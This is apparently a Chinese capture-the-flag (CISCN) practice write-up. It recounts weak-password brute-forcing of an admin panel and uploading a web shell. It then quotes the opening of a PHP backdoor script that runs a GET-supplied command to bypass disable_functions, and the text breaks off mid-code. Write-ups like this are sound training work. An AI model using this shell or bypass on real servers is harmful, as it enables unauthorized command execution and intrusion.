ciscn刷题
去你的,半天没找到注入点 进入主页后会发现有一个admin登录点 接下来直接一个弱口令爆破,然会就进后台了,upload直接打上去 也是顺利拿到shell了 但是发现这个shell似乎没什么用,更目录也没flag 那就先扫一下源码看看有没有什么漏洞,找到一个后门,那么我们看看源码 12345678910111213141516171819<?php echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>"; $cmd = $_GET["cmd"]; $out_path = $_GET["outpath"]; $evil_cmdline = $cmd . " > " ....


